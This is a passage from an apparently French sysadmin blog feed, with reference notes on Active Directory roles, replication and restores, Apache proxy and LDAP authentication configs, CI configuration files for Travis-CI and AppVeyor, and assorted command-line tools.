<tr>
<td>RODC</td>
<td>Read Only Domain Controller. Il ne peut forcer aucune modification depuis lui</td>
</tr>
</tbody>
</table>
<h2>Les outils et services</h2>
<ul>
<li>ADAC Repose sur l'utilisation exclusive de PowerShell et permet d'en visualiser l'historique.</li>
<li>Modification ADSI : éditeur LDAP qui permet d'afficher ou de modifier les valeurs des attributs des objets</li>
<li>Schéma Active Directory : pour afficher ou modifier les classes d'objets ou les attributs</li>
</ul>
<h2>Ligne de commande</h2>
<table>
<thead>
<tr>
<th>Commande</th>
<th>Utilité</th>
</tr>
</thead>
<tbody>
<tr>
<td>dcdiag</td>
<td>Diagnostic des contrôleurs de domaine</td>
</tr>
<tr>
<td>netdom</td>
<td>Outil de gestion de comptes et des relations d'approbation</td>
</tr>
<tr>
<td>nltest</td>
<td>Test et diagnostics en contexte de domaine</td>
</tr>
<tr>
<td>ntdutil</td>
<td>Gestion et maintenance contrôleurs et AD</td>
</tr>
<tr>
<td>repadmin</td>
<td>Diagnostic et actions liés à la réplication</td>
</tr>
<tr>
<td>w32tm</td>
<td>Gestion du service de temps Windows</td>
</tr>
</tbody>
</table>
<h2>Les niveaux fonctionnels</h2>
<table>
<thead>
<tr>
<th>NF de domaine</th>
<th>2000 mixte</th>
<th>2000 natif</th>
<th>2003</th>
<th>2008</th>
<th>2008 R2</th>
<th>2012</th>
<th>2012 R2</th>
</tr>
</thead>
<tbody>
<tr>
<td>Version des DC</td>
<td>NT / 2000</td>
<td>2000</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>.</td>
<td>2003 / 2003 R2</td>
<td>2003 / 2003 R2</td>
<td>2003 / 2003 R2</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>.</td>
<td>.</td>
<td>2008 / 2008 R2</td>
<td>2008 / 2008 R2</td>
<td>2008 / 2008 R2</td>
<td>2008 R2</td>
<td></td>
<td></td>
</tr>
<tr>
<td>.</td>
<td>.</td>
<td>.</td>
<td>2012</td>
<td>2012 / 2012 R2</td>
<td>2012 / 2012 R2</td>
<td>2012 / 2012 R2</td>
<td>2012 R2</td>
</tr>
<tr>
<td>NF de forêt</td>
<td>.</td>
<td>2000</td>
<td>2003</td>
<td>2008</td>
<td>2008 R2</td>
<td>2012</td>
<td>2012 R2</td>
</tr>
</tbody>
</table>
<h2>RODC</h2>
<ul>
<li>La réplication se fait seulement vers lui</li>
<li>Il est possible de cibler des comptes utilisateurs pour la mise en cache de leur mot de passe</li>
<li>Il dispose d'un compte Administrateur local</li>
<li>Ses partenaires de réplication doivent être sous WS2008 ou supérieur</li>
<li>Le domaine peut être préparer via l'utilitaire adprep</li>
</ul>
<h2>Maître d'opération</h2>
<table>
<thead>
<tr>
<th>Nom du rôle</th>
<th>Etendue de son unicité</th>
<th>Détails</th>
</tr>
</thead>
<tbody>
<tr>
<td>Maître d'attribution des noms de domaines</td>
<td>La forêt</td>
<td></td>
</tr>
<tr>
<td>Maître du schéma</td>
<td>La forêt</td>
<td>Seul contrôleur disposant d'un accès en écriture sur le schéma</td>
</tr>
<tr>
<td>Emulateur CDP</td>
<td>Le domaine</td>
<td>Gestion des mises à jour des mots de passe/GPO, source du temps pour les DC</td>
</tr>
<tr>
<td>Maître d'infrastructure</td>
<td>Le domaine</td>
<td>Référence d'objets inter-domaines</td>
</tr>
<tr>
<td>Maître RID</td>
<td>Le domaine</td>
<td>Alloue les plages RID à chaque DC (utiliser pour les SID)</td>
</tr>
</tbody>
</table>
<p>Seule le premier contrôleur de domaine du domaine racine de la forêt dispose de l'ensemble des rôles.</p>
<h2>Recommandations</h2>
<table>
<thead>
<tr>
<th>Rôles</th>
<th>Positionnement</th>
</tr>
</thead>
<tbody>
<tr>
<td>Maitre de schéma et attribution des noms de domaine</td>
<td>Sur le même contrôleur de préférence</td>
</tr>
<tr>
<td>Emulateur CDP et Maitre RID</td>
<td>Sur le même contrôleur de préférence</td>
</tr>
<tr>
<td>Maitre d'infrastructure</td>
<td>Domaine multiple : incompatible avec CG - Domaine unique : pas utilisé</td>
</tr>
</tbody>
</table>
<h2>Planification de l'installation</h2>
<h2>Limite du domaine</h2>
<ul>
<li>Limite d'administration</li>
<li>Limite d'application des stratégies</li>
<li>Limite d'audit et de stratégie de mot de passe et de compte</li>
<li>Réplication de la partition de domaine</li>
<li>Réplication des zones DNS du domaine</li>
</ul>
<h2>Limite de la forêt</h2>
<ul>
<li>Limite de sécurité</li>
<li>Limite de réplication du schéma, de la configuration et du CG</li>
<li>Réplication des zones DNS de la forêt</li>
</ul>
<h2>Intérêt de mise en place de domaines multiples</h2>
<ul>
<li>Limiter la réplication afin d'éviter de charger les liens de sites</li>
<li>Contraintes liées à l'espace de nom DNS</li>
<li>Contraintes de délégation ou d'administration différentes</li>
</ul>
<h2>Intérêt de mise en place de forêt multiples</h2>
<ul>
<li>Isolement de sécurité</li>
<li>Isolation administratifs</li>
<li>Schémas incompatibles</li>
</ul>
<h2>adprep</h2>
<table>
<thead>
<tr>
<th>Commutateur employé</th>
<th>Contrôleur sur lequel effectuer la commande</th>
</tr>
</thead>
<tbody>
<tr>
<td>/forestprep</td>
<td>Le maître de schéma</td>
</tr>
<tr>
<td>/domainprep</td>
<td>Le maître d'infrastructure</td>
</tr>
<tr>
<td>/rodcprep</td>
<td>Aucun</td>
</tr>
</tbody>
</table>
<h1>Réplication Active Directory</h1>
<h2>Fonctionnement globale</h2>
<table>
<thead>
<tr>
<th>Type de réplication</th>
<th>Caractéristiques du fonctionnement</th>
<th>Générateur de topologie</th>
</tr>
</thead>
<tbody>
<tr>
<td>Intrasite</td>
<td>Liaisons direct - Délais courts</td>
<td>KCC : Knowledge Consistency Checker</td>
</tr>
<tr>
<td>Intersite</td>
<td>Plusieurs réseaux - Délais relatifs aux liens - Planification</td>
<td>ISTG : InterSite Topology Generator</td>
</tr>
</tbody>
</table>
<ul>
<li>La communication réseau doit être fonctionnelle entre les différents contrôleurs de domaine d'un même réseau</li>
<li>La réplication s'appuie sur une infrastructure routée, les différents réseaux doivent être reliés entre eux</li>
<li>L'authentification utilisant Kerberos, le décalage horaire entre les contrôleurs sera de préférence nul sinon minime (moins de 5min)</li>
<li>La résolution de noms et le service DNS doivent être fonctionnels</li>
</ul>
<h2>Services de réplication</h2>
<table>
<thead>
<tr>
<th>OS</th>
<th>Service par défaut</th>
<th>Service disponible</th>
</tr>
</thead>
<tbody>
<tr>
<td>2000</td>
<td>NTFRS</td>
<td>-</td>
</tr>
<tr>
<td>2003</td>
<td>NTFRS</td>
<td>-</td>
</tr>
<tr>
<td>2008</td>
<td>NTFRS</td>
<td>DFSR</td>
</tr>
<tr>
<td>2012</td>
<td>DFSR</td>
<td>-</td>
</tr>
</tbody>
</table>
<h2>Site AD</h2>
<ul>
<li>Réplication AD</li>
<li>Poste client pour s'authentifier et solliciter les services AD</li>
<li>Autres services comme Exchange et DFS</li>
<li>Liaison avec les GPO</li>
</ul>
<div class="highlight"><pre><span></span><code><span class="c"># Site d'appartenance d'un contrôleur</span>
<span class="nb">Get-ADReplicationSite</span>
</code></pre></div>
<h2>Types de liens</h2>
<table>
<thead>
<tr>
<th>Protocole</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>IP</td>
<td>Synchrone - Permet la réplication de l'ensemble des partitions de l'annuaire</td>
</tr>
<tr>
<td>SMTP</td>
<td>Asynchrone - Ne permet pas la réplication de la partition de domaine</td>
</tr>
</tbody>
</table>
<h2>Topologie</h2>
<h2>Si le nombre de DC inférieur à 7</h2>
<p><img alt="" src="https://img.nlegall.fr/cDqWkoqd"></p>
<h2>Si le nombre de DC supérieur à 7</h2>
<p><img alt="" src="https://img.nlegall.fr/tYtYC47Q"></p>
<p><em>Seul trois sauts sont possibles</em></p>
<h2>Intersite</h2>
<h2>ISTG</h2>
<p>Pour chaque site AD, un des services KCC est désigné ISTG (InterSite Topology Generator). Il participe à la construction de la topologie de réplication intersite. Il désigne le ou les serveurs têtes de pont par partition pour son site et créer les objets connexion entre son site et les autres partenaires.</p>
<ul>
<li>Lien transitif : Les transferts se font sur le lien possédant le plus faible coût</li>
<li>Lien non-transitif : Les transferts se font en P2P</li>
</ul>
<h2>Délais de réplication</h2>
<table>
<thead>
<tr>
<th>Type</th>
<th>Délai</th>
<th>Détails</th>
</tr>
</thead>
<tbody>
<tr>
<td>Intrasite</td>
<td>Maximum une minute</td>
<td>Délai initial 15s - Délai entre ses partenaires 3s - 3 sauts max</td>
</tr>
<tr>
<td>Intersite</td>
<td>15min à 3h</td>
<td>Délai d'interrogation 3h par défaut (15min conseillé)</td>
</tr>
<tr>
<td>Réplication urgente</td>
<td>Aucun délai initial ou avant retransmission</td>
<td>Stratégie verrouillage/mot de passe - maître RID - LSA secret - déverrouillage de compte <em>(intrasite seulement par défaut)</em></td>
</tr>
<tr>
<td>Réplication des MaJ de mot de passe</td>
<td>Aucun délai vers le CDP - délai avec retransmission</td>
<td>Mot de passe sur un DC</td>
</tr>
</tbody>
</table>
<h1>Relation d'approbation</h1>
<ul>
<li>Permet l'utilisation d'informations d'identification dans un domaine autre que celui d'origine</li>
<li>Contrôleurs sollicités pour valider les connexions</li>
<li>Trois niveau de configuration : type, transitivité et direction</li>
</ul>
<h2>Termes</h2>
<ul>
<li>Domaine approuvé : domaine d'authentification</li>
<li>Domaine autorisé à approuver : domaine ressource</li>
<li>Approbation entrante : authentification des utilisateurs de son domaine depuis les ressources de l'autre domaine</li>
<li>Approbation sortante : authentification sur les ressources de son domaine avec les utilisateurs de l'autre domaine</li>
</ul>
<h2>Types</h2>
<table>
<thead>
<tr>
<th>Type</th>
<th>Direction</th>
<th>Transitivité</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>Parent/Enfant</td>
<td>Bidirectionnelle</td>
<td>Oui</td>
<td>A la création d'un domaine enfant</td>
</tr>
<tr>
<td>Racine arborescence</td>
<td>Bidirectionnelle</td>
<td>Oui</td>
<td>A la création d'un arbre de la forêt</td>
</tr>
<tr>
<td>Raccourci</td>
<td>Unique ou bidirectionnelle</td>
<td>Oui</td>
<td>Entre domaine distincts - Améliore les délais</td>
</tr>
<tr>
<td>Forêt</td>
<td>Unique ou bidirectionnelle</td>
<td>Non</td>
<td>Entre les domaines racine de forêt</td>
</tr>
<tr>
<td>Externe</td>
<td>Unique ou bidirectionnelle</td>
<td>Non</td>
<td>Entre domaines de forêt différentes</td>
</tr>
<tr>
<td>Domaine (kerberos)</td>
<td>Unique ou bidirectionnelle</td>
<td>Configurable</td>
<td>Vers les domaines de type Kerberos non MS</td>
</tr>
</tbody>
</table>
<h1>Maintenance des services d'annuaire</h1>
<h2>Gestion de la base de données</h2>
<ul>
<li>Sauvegarde et restauration</li>
<li>Défragmentation en ligne/hors-ligne : Automatique (12h par défaut), optimise la base de données mais ne libère pas d'espace libre pour en ligne (hors-ligne possible via une procédure précise)</li>
<li>Création et utilisation d'instantanés :pris en charge depuis 2008, via la commande <code>ntdsutil</code></li>
</ul>
<h2>Outil MS</h2>
<ul>
<li>Depuis Windows 2008 : wbadmin (GUI et CLI) et wbengine (service)</li>
<li>Support de sauvegarde local ou réseau</li>
<li>Gérer les sauvegardes au format VHD et VHDX depuis le gestionnaire des disques</li>
</ul>
<h2>Démarrage DSRM</h2>
<h2>Restauration ne faisant pas autorité</h2>
<p><img alt="" src="https://img.nlegall.fr/5VM75GFF"></p>
<ol>
<li>Démarrage en mode DSRM du contrôleur à restaurer</li>
<li>Restauration de la base AD</li>
<li>Démarrage en mode normal du contrôleur</li>
<li>Réplication des modifications sur les autres contrôleurs</li>
</ol>
<h2>Restauration ne faisant pas autorité</h2>
<p>SCHEME</p>
<ol>
<li>Démarrage en mode DSRM du contrôleur à restaurer</li>
<li>Restauration de la base AD</li>
<li>Ciblage des objets faisant autorité</li>
<li>Définition de l'instance NTDS</li>
<li>Sélection du contexte</li>
<li>Restauration à partir de l'OU</li>
<li>Démarrage en mode normal du contrôleur</li>
<li>Réplication des modifications sur les autres contrôleurs</li>
</ol>
<h2>Définitions</h2>
<table>
<thead>
<tr>
<th>Terme</th>
<th>Définition</th>
</tr>
</thead>
<tbody>
<tr>
<td>Objet Tombstone</td>
<td>Objets transformés suite à une demande de suppression</td>
</tr>
<tr>
<td>Tombstone Lifetime</td>
<td>Durée de vie d'un objet tombstone</td>
</tr>
<tr>
<td>Garbage Collection</td>
<td>Routine s’exécutant localement sur chaque contrôleur de domaine. Il s’acquitte de l’opération de purge des objets tombstone ayant atteint leur durée de vie précisée par la valeur de l’attribut tombstonelifetime.</td>
</tr>
</tbody>
</table>Apache22018-11-24T10:20:00+01:002018-11-24T10:20:00+01:00nlegalltag:blog.nlegall.fr,2018-11-24:/apache2.html<h2>Proxy Transmission</h2>
<p>Fichiers requis pour le SSL et protection par mot de passe</p>
<div class="highlight"><pre><span></span><code>openssl req -x509 -nodes -days <span class="m">365</span> -newkey rsa:4096 -out /etc/apache2/server.crt -keyout /etc/apache2/server.key
htpasswd -c /etc/apache2/.htpasswd user1
a2enmod proxy
a2enmod proxy_http
a2enmod ssl
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="nb">SSLEngine</span> <span class="k">on</span>
<span class="nb">SSLCertificateFile</span> <span class="sx">/etc/apache2/server …</span></code></pre></div><h2>Proxy Transmission</h2>
<p>Fichiers requis pour le SSL et protection par mot de passe</p>
<div class="highlight"><pre><span></span><code>openssl req -x509 -nodes -days <span class="m">365</span> -newkey rsa:4096 -out /etc/apache2/server.crt -keyout /etc/apache2/server.key
htpasswd -c /etc/apache2/.htpasswd user1
a2enmod proxy
a2enmod proxy_http
a2enmod ssl
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="nb">SSLEngine</span> <span class="k">on</span>
<span class="nb">SSLCertificateFile</span> <span class="sx">/etc/apache2/server.crt</span>
<span class="nb">SSLCertificateKeyFile</span> <span class="sx">/etc/apache2/server.key</span>
<span class="nt"><Location</span> <span class="s">/</span><span class="nt">></span>
<span class="nb">AuthType</span> Basic
<span class="nb">AuthName</span> <span class="s2">"Authentication Required"</span>
<span class="nb">AuthUserFile</span> <span class="s2">"/etc/apache2/.htpasswd"</span>
<span class="nb">Require</span> valid-user
<span class="nt"></Location></span>
<span class="nb">ProxyPass</span> / http://1.2.3.4:9091/
<span class="nb">ProxyPassReverse</span> / http://1.2.3.4:9091/
</code></pre></div>
<h2>Proxy ownCloud</h2>
<h2>Authentification LDAP/AD</h2>
<div class="highlight"><pre><span></span><code>a2enmod ldap authnz_ldap
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="c">#vim /etc/apache2/sites-available/namesite.conf</span>
<span class="nb">AuthName</span> <span class="s2">"Put in your own prompt message"</span>
<span class="nb">AuthType</span> Basic
<span class="nb">AuthBasicProvider</span> ldap
<span class="nb">AuthLDAPUrl</span> <span class="s2">"ldap://cicntp12:389/DC=local,DC=lan?sAMAccountName?sub?(objectClass=*)"</span>
<span class="nb">Require</span> valid-user
<span class="nb">AuthLDAPBindDN</span> <span class="s2">"CN=Username,OU=Users,DC=local,DC=lan"</span>
<span class="nb">AuthLDAPBindPassword</span> password
</code></pre></div>CI (Intégration continue)2018-11-24T10:20:00+01:002018-11-24T10:20:00+01:00nlegalltag:blog.nlegall.fr,2018-11-24:/ci-integration-continue.html<h1><img alt="" src="https://img.nlegall.fr/Aqwm1Xtq"> Travis-CI</h1>
<p><em>Nom du fichier : <code>.travis.yml</code></em></p>
<h2>.NET</h2>
<div class="highlight"><pre><span></span><code><span class="nt">language</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">csharp</span>
<span class="nt">solution</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">solution.sln</span>
<span class="nt">install</span><span class="p">:</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">sudo apt-get install -y gtk-sharp2</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">nuget restore solution.sln</span>
<span class="nt">addons</span><span class="p">:</span>
<span class="nt">sonarqube</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">true</span>
<span class="nt">env</span><span class="p">:</span>
<span class="nt">global</span><span class="p">:</span>
<span class="nt">secure</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">SONARQUBE_TOKEN_SECURE</span>
<span class="nt">script</span><span class="p">:</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">xbuild /p:Configuration=Release solution.sln</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">sonar-scanner -Dsonar.login=$SONAR_TOKEN</span>
</code></pre></div>
<h1><img alt="" src="https://img.nlegall.fr/FYNtjdU6"> Ionic</h1>
<div class="highlight"><pre><span></span><code><span class="nt">sudo</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">false</span>
<span class="nt">language</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">node_js</span>
<span class="nt">node_js</span><span class="p">:</span>
<span class="p p-Indicator">-</span> <span class="s">"0.12.2"</span>
<span class="nt">addons …</span></code></pre></div><h1><img alt="" src="https://img.nlegall.fr/Aqwm1Xtq"> Travis-CI</h1>
<p><em>Nom du fichier : <code>.travis.yml</code></em></p>
<h2>.NET</h2>
<div class="highlight"><pre><span></span><code><span class="nt">language</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">csharp</span>
<span class="nt">solution</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">solution.sln</span>
<span class="nt">install</span><span class="p">:</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">sudo apt-get install -y gtk-sharp2</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">nuget restore solution.sln</span>
<span class="nt">addons</span><span class="p">:</span>
<span class="nt">sonarqube</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">true</span>
<span class="nt">env</span><span class="p">:</span>
<span class="nt">global</span><span class="p">:</span>
<span class="nt">secure</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">SONARQUBE_TOKEN_SECURE</span>
<span class="nt">script</span><span class="p">:</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">xbuild /p:Configuration=Release solution.sln</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">sonar-scanner -Dsonar.login=$SONAR_TOKEN</span>
</code></pre></div>
<h1><img alt="" src="https://img.nlegall.fr/FYNtjdU6"> Ionic</h1>
<div class="highlight"><pre><span></span><code><span class="nt">sudo</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">false</span>
<span class="nt">language</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">node_js</span>
<span class="nt">node_js</span><span class="p">:</span>
<span class="p p-Indicator">-</span> <span class="s">"0.12.2"</span>
<span class="nt">addons</span><span class="p">:</span>
<span class="nt">apt</span><span class="p">:</span>
<span class="nt">sources</span><span class="p">:</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">ubuntu-toolchain-r-test</span>
<span class="nt">packages</span><span class="p">:</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">g++-4.8</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">openjdk-7-jdk</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">lib32stdc++6</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">lib32z1</span>
<span class="nt">env</span><span class="p">:</span>
<span class="l l-Scalar l-Scalar-Plain">CXX=g++-4.8</span>
<span class="nt">install</span><span class="p">:</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">npm config set registry https://registry.npmjs.org/</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">npm install -g gulp bower cordova ionic</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">npm install</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">bower update</span>
<span class="nt">before_script</span><span class="p">:</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">wget http://dl.google.com/android/android-sdk_r24.4-linux.tgz</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">tar -xvf android-sdk_r24.4-linux.tgz</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">echo y | ./android-sdk-linux/tools/android update sdk --no-ui --all --filter platform-tools</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">echo y | ./android-sdk-linux/tools/android update sdk --no-ui --all --filter build-tools-23.0.2</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">echo y | ./android-sdk-linux/tools/android update sdk --no-ui --all --filter android-23</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">echo y | ./android-sdk-linux/tools/android update sdk --no-ui --all --filter extra-android-support</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">echo y | ./android-sdk-linux/tools/android update sdk --no-ui --all --filter extra-android-m2repository</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">echo y | ./android-sdk-linux/tools/android update sdk --no-ui --all --filter extra-google-m2repository</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">export ANDROID_HOME=$PWD/android-sdk-linux</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">export PATH=${PATH}:$ANDROID_HOME/tools:$ANDROID_HOME/platform-tools:$ANDROID_HOME/build-tools/23.0.2</span>
<span class="nt">script</span><span class="p">:</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">ionic platform remove android</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">ionic platform add android</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">ionic resources --icon</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">chmod +x hooks/after_prepare/010_add_platform_class.js</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">ionic build android</span>
</code></pre></div>
<h1><img alt="" src="https://img.nlegall.fr/pFYMC2It"> Appveyor</h1>
<p>Ce site permet de faire de l'intégration continue sur des projets Visual Studio (.NET).</p>
<h2>Fichier de configuration</h2>
<p>Le fichier de configuration ci-dessous permet d'installer l'ensemble des packages NuGet requis avant le build, l'envoie des résultats des tests unitaires sur le site coveralls.io ainsi que la notification sur un chan Slack sur la réussite ou non de l'opération.</p>
<p>Si vous souhaitez plus de détails, vous pouvez utiliser la documentation de ce fichier trouvable ici : https://www.appveyor.com/docs/.</p>
<p>Nom : <code>appveyor.yml</code></p>
<div class="highlight"><pre><span></span><code><span class="nt">version</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">0.0.0.{build}</span>
<span class="nt">environment</span><span class="p">:</span>
<span class="nt">COVERALLS_REPO_TOKEN</span><span class="p">:</span>
<span class="nt">secure</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">uZr+CJU4Pl/9ySY0sDQh62xBZaqlEQB7s6fZEmG58InhSjbwslq6mKIWxd1Q55TO</span>
<span class="nt">platform</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">Any CPU</span>
<span class="nt">before_build</span><span class="p">:</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">nuget restore SolutionName.sln</span>
<span class="nt">build</span><span class="p">:</span>
<span class="nt">project</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">SolutionName.sln</span>
<span class="c1"># Spécifie les actiopons après les tests automatiques de Appveyor</span>
<span class="nt">after_test</span><span class="p">:</span>
<span class="p p-Indicator">-</span> <span class="nt">cmd</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">.\after_test.cmd</span>
<span class="c1">#---------------------------------#</span>
<span class="c1"># notifications #</span>
<span class="c1">#---------------------------------#</span>
<span class="nt">notifications</span><span class="p">:</span>
<span class="c1"># Slack</span>
<span class="p p-Indicator">-</span> <span class="nt">provider</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">Slack</span>
<span class="nt">incoming_webhook</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">https://hooks.slack.com/services/xxxxxx/yyyyyyyy/zzzzzzzzzz</span>
</code></pre></div>
<h1><img alt="" src="https://img.nlegall.fr/7Gu35eFm"> Coveralls</h1>
<p>Afin de faire des tests unitaires via Visual Studio, vous pouvez utiliser le framework NUnit (http://nunit.org/). C'est actuellement le plus répandu et utilisé. Les résultats de ces tests peuvent être ensuite envoyé sur le site de Coveralls. Cela permet un suivi de ces-derniers ainsi qu'un ensemble d'éléments graphiques.</p>
<p>Pour ce faire, vous devez installer les packages NuGet suivant :</p>
<ul>
<li>NUnit</li>
<li>NUnitConsoleRunner</li>
<li>NUnit3TestAdpater</li>
</ul>
<p>Les deux packages NuGet suivant sont utilisé si vous souhaitez envoyer les résultats de ces tests sur le site coveralls.io :</p>
<ul>
<li>coveralls.net</li>
<li>OpenCover</li>
</ul>
<div class="highlight"><pre><span></span><code><span class="n">nuget</span> <span class="n">install</span> <span class="n">NUnit</span><span class="p">.</span><span class="n">Runners</span> <span class="o">-</span><span class="k">Version</span> <span class="mi">3</span><span class="p">.</span><span class="mi">4</span><span class="p">.</span><span class="mi">1</span> <span class="o">-</span><span class="n">OutputDirectory</span> <span class="n">tools</span>
<span class="n">nuget</span> <span class="n">install</span> <span class="n">OpenCover</span> <span class="o">-</span><span class="k">Version</span> <span class="mi">4</span><span class="p">.</span><span class="mi">6</span><span class="p">.</span><span class="mi">519</span> <span class="o">-</span><span class="n">OutputDirectory</span> <span class="n">tools</span>
<span class="n">nuget</span> <span class="n">install</span> <span class="n">coveralls</span><span class="p">.</span><span class="n">net</span> <span class="o">-</span><span class="k">Version</span> <span class="mi">0</span><span class="p">.</span><span class="mi">7</span><span class="p">.</span><span class="mi">0</span> <span class="o">-</span><span class="n">OutputDirectory</span> <span class="n">tools</span>
<span class="p">.</span><span class="err">\</span><span class="n">tools</span><span class="err">\</span><span class="n">OpenCover</span><span class="p">.</span><span class="mi">4</span><span class="p">.</span><span class="mi">6</span><span class="p">.</span><span class="mi">519</span><span class="err">\</span><span class="n">tools</span><span class="err">\</span><span class="n">OpenCover</span><span class="p">.</span><span class="n">Console</span><span class="p">.</span><span class="n">exe</span> <span class="o">-</span><span class="n">target</span><span class="p">:.</span><span class="err">\</span><span class="n">tools</span><span class="err">\</span><span class="n">NUnit</span><span class="p">.</span><span class="n">ConsoleRunner</span><span class="p">.</span><span class="mi">3</span><span class="p">.</span><span class="mi">4</span><span class="p">.</span><span class="mi">1</span><span class="err">\</span><span class="n">tools</span><span class="err">\</span><span class="n">nunit3</span><span class="o">-</span><span class="n">console</span><span class="p">.</span><span class="n">exe</span> <span class="o">-</span><span class="n">targetargs</span><span class="p">:</span><span class="ss">".\NUnitTest\bin\Debug\NUnitTest.dll"</span> <span class="o">-</span><span class="n">register</span><span class="p">:</span><span class="k">user</span>
<span class="p">.</span><span class="err">\</span><span class="n">tools</span><span class="err">\</span><span class="n">coveralls</span><span class="p">.</span><span class="n">net</span><span class="p">.</span><span class="mi">0</span><span class="p">.</span><span class="mi">7</span><span class="p">.</span><span class="mi">0</span><span class="err">\</span><span class="n">tools</span><span class="err">\</span><span class="n">csmacnz</span><span class="p">.</span><span class="n">Coveralls</span><span class="p">.</span><span class="n">exe</span> <span class="c1">--opencover -i .\results.xml</span>
</code></pre></div>Divers2018-11-24T10:20:00+01:002018-11-24T10:20:00+01:00nlegalltag:blog.nlegall.fr,2018-11-24:/divers.html<h1>Mediainfo</h1>
<div class="highlight"><pre><span></span><code><span class="err">--Inform="General;%FileSize/String%"</span>
<span class="err">--Inform="Video;%BitRate/String%"</span>
<span class="err">--Inform="Audio;%BitRate/String%"</span>
</code></pre></div>
<h1>Optimisation</h1>
<h2>PNG</h2>
<div class="highlight"><pre><span></span><code>apt install optipng
optipng -o <span class="m">7</span> *.png
</code></pre></div>
<h2>JPEG</h2>
<div class="highlight"><pre><span></span><code>apt install jpegoptim
jpegoptim *.jpg
</code></pre></div>
<h2>HTML / JS / CSS</h2>
<p>http://refresh-sf.com/</p>
<h2>Récupérer des vidéos</h2>
<p>youtube dl : https://rg3.github.io/youtube-dl/</p>
<h1>FTP/TLS</h1>
<div class="highlight"><pre><span></span><code>apt install lftp
lftp …</code></pre></div><h1>Mediainfo</h1>
<div class="highlight"><pre><span></span><code><span class="err">--Inform="General;%FileSize/String%"</span>
<span class="err">--Inform="Video;%BitRate/String%"</span>
<span class="err">--Inform="Audio;%BitRate/String%"</span>
</code></pre></div>
<h1>Optimisation</h1>
<h2>PNG</h2>
<div class="highlight"><pre><span></span><code>apt install optipng
optipng -o <span class="m">7</span> *.png
</code></pre></div>
<h2>JPEG</h2>
<div class="highlight"><pre><span></span><code>apt install jpegoptim
jpegoptim *.jpg
</code></pre></div>
<h2>HTML / JS / CSS</h2>
<p>http://refresh-sf.com/</p>
<h2>Récupérer des vidéos</h2>
<p>youtube dl : https://rg3.github.io/youtube-dl/</p>
<h1>FTP/TLS</h1>
<div class="highlight"><pre><span></span><code>apt install lftp
lftp -du user,password ftp.example.com
<span class="nb">set</span> ssl:verify-certificate no
</code></pre></div>
<h1>Vérification site Web</h1>
<p>https://www.htbridge.com/ssl/
https://spdycheck.org/
http://yellowlab.tools/</p>
<h1>Firefox</h1>
